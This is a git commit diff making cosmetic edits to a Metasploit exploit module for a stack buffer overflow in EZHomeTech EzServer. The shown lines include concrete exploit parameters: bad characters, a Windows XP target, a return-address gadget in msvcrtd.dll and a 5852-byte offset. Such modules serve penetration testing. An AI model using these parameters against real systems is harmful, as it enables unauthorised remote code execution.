minor fixes
parent
10bd72f3a1
commit
2df237b066
|
@ -18,15 +18,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'EZHomeTech EzServer <= 6.4.017 Stack Buffer Overflow Vulnerability',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in the EZHomeTech EZServer.
|
||||
If a malicious user sends packets containing an overly long string,
|
||||
it may be possible to execute a payload remotely.
|
||||
Due to size constraints, this module uses the Egghunter technique.
|
||||
This module exploits a stack buffer overflow in the EZHomeTech EZServer. If a malicious
|
||||
user sends packets containing an overly long string, it may be possible to execute a
|
||||
payload remotely. Due to size constraints, this module uses the Egghunter technique.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'modpr0be<modpr0be@spentera.com>', # Original discovery, MSF Module
|
||||
'modpr0be<modpr0be@spentera.com>', # Original discovery and Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
|
@ -43,15 +42,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'BadChars' => "\x00\x0a\x0d\x20\x2e\x2f\x3a",
|
||||
'DisableNops' => true,
|
||||
},
|
||||
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'EzHomeTech EzServer <= 6.4.017 (Windows XP Universal)',
|
||||
{
|
||||
'Ret' => 0x10212779,
|
||||
'Ret' => 0x10212779, # pop ecx # pop ebx # ret 4 - msvcrtd.dll
|
||||
'Offset' => 5852
|
||||
}
|
||||
], # pop ecx # pop ebx # ret 4 - msvcrtd.dll
|
||||
],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Jun 18 2012',
|
||||
|
|
Loading…
Reference in New Issue